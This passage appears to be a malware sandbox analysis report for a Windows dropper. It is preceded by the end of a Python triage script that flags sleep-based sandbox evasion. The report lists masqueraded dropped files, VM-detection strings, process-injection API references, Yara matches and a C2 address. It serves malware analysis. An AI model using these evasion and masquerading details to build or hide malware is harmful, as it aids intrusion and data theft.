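        if shrinking >= 2 or s["sleep_loop_max"] > 30 or s["rdtsc"]:
            suspects.append(proc)
    return suspects


# Constructed input: lines copied from this report section, path and event separated.
SAMPLE = r"""
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe Memory allocated: EF0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe Code function: 2_2_004012D9 rdtsc 2_2_004012D9
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe Thread delayed: delay time: 599889
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe Thread delayed: delay time: 599781
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe Thread delayed: delay time: 599321
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe Window / User API: threadDelayed 558
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe TID: 7888 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe TID: 7716 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\regedit\explorer.exe TID: 4476 Thread sleep time: -4611686018427385s >= -30000s
""".strip().splitlines()

if __name__ == "__main__":
    stats = triage(SAMPLE)
    for proc, s in stats.items():
        print(proc, s)
    print("sleep-evasion suspects:", sleep_evasion_suspects(stats))
```

Run it against the full behaviour listing of a report (one "Source:" line per input line) and the parked-thread entries drop out of the picture; what remains is the WerFault.exe-named dropper with its shrinking ten-minute waits and 558-iteration sleep loop, and the original sample with its rdtsc timing check. The explorer.exe thread with a 5x infinite total is only a thread that was parked several times, which is why it is not listed as a suspect.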
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe TID: 7276 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe TID: 7888 Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe TID: 7888 Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe TID: 7888 Thread sleep time: -599889s >= -30000s
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe TID: 7892 Thread sleep count: 558 > 30
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe TID: 7888 Thread sleep time: -599781s >= -30000s
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe TID: 7888 Thread sleep time: -599672s >= -30000s
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe TID: 7888 Thread sleep time: -599321s >= -30000s
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe TID: 7716 Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe TID: 7628 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\regedit\explorer.exe TID: 7780 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe TID: 7784 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe TID: 8120 Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe TID: 8120 Thread sleep time: -600000s >= -30000s
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe TID: 8128 Thread sleep count: 122 > 30
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe TID: 8120 Thread sleep time: -599874s >= -30000s
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe TID: 8128 Thread sleep count: 675 > 30
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe TID: 8120 Thread sleep time: -599765s >= -30000s
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe TID: 8120 Thread sleep time: -599656s >= -30000s
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe TID: 8120 Thread sleep time: -599547s >= -30000s
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe TID: 8068 Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\regedit\explorer.exe TID: 4476 Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\regedit\explorer.exe TID: 4476 Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\regedit\explorer.exe TID: 4476Thread sleep time: -599890s >= -30000s
                    Source: C:\Windows\regedit\explorer.exe TID: 1544Thread sleep count: 1195 > 30
                    Source: C:\Windows\regedit\explorer.exe TID: 4476Thread sleep time: -599781s >= -30000s
                    Source: C:\Windows\regedit\explorer.exe TID: 4476Thread sleep time: -599672s >= -30000s
                    Source: C:\Windows\regedit\explorer.exe TID: 4476Thread sleep time: -599562s >= -30000s
                    Source: C:\Windows\regedit\explorer.exe TID: 4476Thread sleep time: -599453s >= -30000s
                    Source: C:\Windows\regedit\explorer.exe TID: 4476Thread sleep time: -599343s >= -30000s
                    Source: C:\Windows\regedit\explorer.exe TID: 1096Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\regedit\explorer.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\regedit\explorer.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeCode function: 7_2_00406301 FindFirstFileW,FindClose,7_2_00406301
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeCode function: 7_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00406CC7
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 0_2_00F3CB04 GetSystemInfo,0_2_00F3CB04
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeThread delayed: delay time: 599889Jump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeThread delayed: delay time: 599321Jump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeThread delayed: delay time: 600000
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeThread delayed: delay time: 599874
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeThread delayed: delay time: 599765
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeThread delayed: delay time: 599656
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeThread delayed: delay time: 599547
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 600000
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 599890
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 599781
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 599672
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 599562
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 599453
                    Source: C:\Windows\regedit\explorer.exeThread delayed: delay time: 599343
                    Source: savesbrokerDriverSavesbroker.exe, 00000005.00000002.1401719918.000000001BBB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 018 VMware, Inc.X.
                    Source: Amcache.hve.6.drBinary or memory string: VMware
                    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: explorer.exe.5.drBinary or memory string: 1998-2018 VMware, Inc.X.
                    Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: WerFault.exe, 00000011.00000002.1428428832.000000001B300000.00000004.00000020.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1525200074.000000001B600000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: explorer.exe, 0000001B.00000002.1783183065.000000001B082000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls
                    Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                    Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeAPI call chain: ExitProcess graph end nodegraph_2-199
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeAPI call chain: ExitProcess graph end nodegraph_2-226
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeAPI call chain: ExitProcess graph end nodegraph_2-251
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeAPI call chain: ExitProcess graph end nodegraph_2-254
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeAPI call chain: ExitProcess graph end nodegraph_2-167
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeAPI call chain: ExitProcess graph end nodegraph_7-5250
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 2_2_004012D9 rdtsc 2_2_004012D9
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 0_2_00F3EE30 LdrInitializeThunk,0_2_00F3EE30
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 2_2_004011CF LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetEnvironmentVariableA,2_2_004011CF
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 2_2_0040119D mov eax, dword ptr fs:[00000030h]2_2_0040119D
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 2_2_004011AF mov eax, dword ptr fs:[00000030h]2_2_004011AF
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeCode function: 2_2_00401AE1 GetCommandLineA,GetModuleHandleA,GetProcessHeap,ExitProcess,2_2_00401AE1
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\regedit\explorer.exeProcess token adjusted: Debug
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Windows\regedit\explorer.exeNetwork Connect: 188.120.228.203 80
                    Source: 0.2.UNFOT5F1qt.exe.2a77064.0.raw.unpack, Core.csReference to suspicious API methods: OpenProcess(2035711u, 0, P_0)
                    Source: 0.2.UNFOT5F1qt.exe.2a77064.0.raw.unpack, Core.csReference to suspicious API methods: ReadProcessMemory(intPtr, num5, array, num4, ref lpNumberOfBytesRead)
                    Source: 0.2.UNFOT5F1qt.exe.2a77064.0.raw.unpack, Core.csReference to suspicious API methods: VirtualProtectEx(intPtr, (uint)(num5 + i + num6 + 232), 50, 64u, out lpflOldProtect)
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeMemory written: C:\Users\user\Desktop\UNFOT5F1qt.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess created: C:\Users\user\Desktop\UNFOT5F1qt.exe "C:\Users\user\Desktop\UNFOT5F1qt.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess created: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe "C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeProcess created: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe "C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeProcess created: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe "C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe" Jump to behavior
                    Source: savesbrokerDriverSavesbroker.exe, 00000005.00000000.1348990255.0000000000822000.00000002.00000001.01000000.00000007.sdmp, WerFault.exe.5.dr, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe0.5.dr, WmiPrvSE.exe.5.dr, savesbrokerDriverSavesbroker.exe.2.dr, RuntimeBroker.exe.5.drBinary or memory string: Shell_TrayWndPath
                    Source: savesbrokerDriverSavesbroker.exe, 00000005.00000000.1348990255.0000000000822000.00000002.00000001.01000000.00000007.sdmp, WerFault.exe.5.dr, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe0.5.dr, WmiPrvSE.exe.5.dr, savesbrokerDriverSavesbroker.exe.2.dr, RuntimeBroker.exe.5.drBinary or memory string: Program ManagerShowHideOpen
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeQueries volume information: C:\Users\user\Desktop\UNFOT5F1qt.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeQueries volume information: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe VolumeInformationJump to behavior
                    Source: C:\Windows\regedit\explorer.exeQueries volume information: C:\Windows\regedit\explorer.exe VolumeInformation
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeQueries volume information: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe VolumeInformation
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeQueries volume information: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe VolumeInformation
                    Source: C:\Windows\regedit\explorer.exeQueries volume information: C:\Windows\regedit\explorer.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exeCode function: 7_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,7_2_00406831
                    Source: C:\Users\user\Desktop\UNFOT5F1qt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                    Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match | File source: 5.0.savesbrokerDriverSavesbroker.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000017.00000002.1520715428.000000000285A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.1476965095.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1397323956.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.1348990255.0000000000822000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1426473572.00000000026A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1476991915.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: savesbrokerDriverSavesbroker.exe PID: 7188, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: WerFault.exe PID: 7604, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 7664, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe PID: 7672, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe PID: 8000, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 616, type: MEMORYSTR
Source: Yara match | File source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, type: DROPPED
Source: Yara match | File source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, type: DROPPED
Source: Yara match | File source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPED
Source: Yara match | File source: C:\Users\Default\WmiPrvSE.exe, type: DROPPED
Source: Yara match | File source: C:\Windows\regedit\explorer.exe, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: 5.0.savesbrokerDriverSavesbroker.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000017.00000002.1520715428.000000000285A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.1476965095.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1397323956.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.1348990255.0000000000822000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1426473572.00000000026A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1476991915.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: savesbrokerDriverSavesbroker.exe PID: 7188, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: WerFault.exe PID: 7604, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 7664, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe PID: 7672, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe PID: 8000, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 616, type: MEMORYSTR
Source: Yara match | File source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, type: DROPPED
Source: Yara match | File source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, type: DROPPED
Source: Yara match | File source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPED
Source: Yara match | File source: C:\Users\Default\WmiPrvSE.exe, type: DROPPED
Source: Yara match | File source: C:\Windows\regedit\explorer.exe, type: DROPPED

MITRE ATT&CK Matrix (a leading number marks a technique with matching signatures in this report)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 11 Input Capture | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 21 Native API | 1 Scheduled Task/Job | 212 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 17 System Information Discovery | Remote Desktop Protocol | 11 Input Capture | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 21 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 4 Obfuscated Files or Information | Security Account Manager | 131 Security Software Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Registry Run Keys / Startup Folder | 2 Software Packing | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 111 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 333 Masquerading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 31 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 212 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph ID: 1563543 | Sample: UNFOT5F1qt.exe | Startdate: 27/11/2024 | Architecture: WINDOWS | Score: 100

Start
